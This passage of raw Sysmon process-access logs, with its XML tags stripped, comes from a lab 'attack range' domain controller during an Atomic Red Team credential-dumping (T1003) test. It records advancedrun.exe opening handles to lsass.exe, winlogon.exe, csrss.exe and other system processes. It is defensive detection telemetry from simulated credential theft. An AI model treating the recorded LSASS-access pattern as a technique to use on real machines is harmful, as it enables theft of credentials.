17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 